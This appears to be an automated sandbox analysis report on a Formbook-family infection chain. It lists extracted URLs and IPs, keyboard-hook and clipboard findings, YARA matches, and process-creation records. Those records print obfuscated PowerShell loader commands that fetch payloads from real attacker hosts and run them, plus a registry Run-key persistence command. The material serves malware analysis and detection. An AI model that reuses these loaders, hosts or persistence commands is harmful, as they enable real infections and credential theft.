Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A42CFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2579735465.0000024A44318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6
              Source: wab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.bin
              Source: wab.exe, 0000000B.00000002.3423060854.000000000605B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.binB
              Source: wab.exe, 0000000B.00000002.3436368353.0000000021810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/UWYVFXQWh32.binHovesValramirex.ro/UWYVFXQWh32.bin
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A42AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/Uncomic.mdpP
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.59.30.6/Uncomic.mdpXR
              Source: powershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
              Source: powershell.exe, 00000014.00000002.3389504984.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: wab.exe, 0000000B.00000002.3423060854.0000000006094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004F63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramirex.ro
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000012.00000002.2541165592.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
              Source: wab.exe, 0000000B.00000002.3437805432.00000000226E0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 00000006.00000002.2505588191.00000000072DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsof.
              Source: wab.exe, 00000010.00000002.2560201870.0000000000164000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A428C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.2503089959.00000000048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.2503089959.0000000004A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.2579735465.0000024A43B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 00000010.00000003.2559759169.0000000000729000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2561259640.0000000000729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_autho
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 00000010.00000003.2559663310.000000000072A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://
              Source: wab.exe, 00000010.00000002.2560964411.00000000004B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000003.00000002.2669451040.0000024A52932000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.000000000593A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2503901264.0000000005A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3321380834.0000000004F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro
              Source: powershell.exe, 00000014.00000002.3321380834.0000000004C8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/Rutschebanes.qxdXR
              Source: wab.exe, wab.exe, 00000012.00000002.2538519469.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51555
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51553
              Source: unknownNetwork traffic detected: HTTP traffic on port 51555 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51553 -> 443
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51553 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:51555 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,17_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,18_2_004072B5

              E-Banking Fraud

              Source: Yara matchFile source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7108, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\jiourhjs.dat, type: DROPPED

              System Summary

              Source: amsi32_4972.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_6420.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2084, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6747
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6771
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 6654
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6654
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. Ph lHSag,regenteaC erudNdlideSt.n
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_050A635E Sleep,NtProtectVirtualMemory
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004016FD NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A335C0 NtCreateMutant,LdrInitializeThunk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A32C70 NtFreeVirtualMemory,LdrInitializeThunk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A32DF0 NtQuerySystemInformation,LdrInitializeThunk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A34340 NtSetContextThread
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A33090 NtSetValueKey
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A33010 NtOpenDirectoryObject
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_22A34650 NtSuspendThread
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_04082542 Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 229EB970 appears 102 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22A7F290 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22A47E54 appears 39 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 22A6EA12 appears 51 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
              Source: amsi32_4972.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6420.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3408938742.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000002.3137363083.0000000022D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3417419300.0000000004A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001D.00000002.3416540680.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001C.00000002.3417935091.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
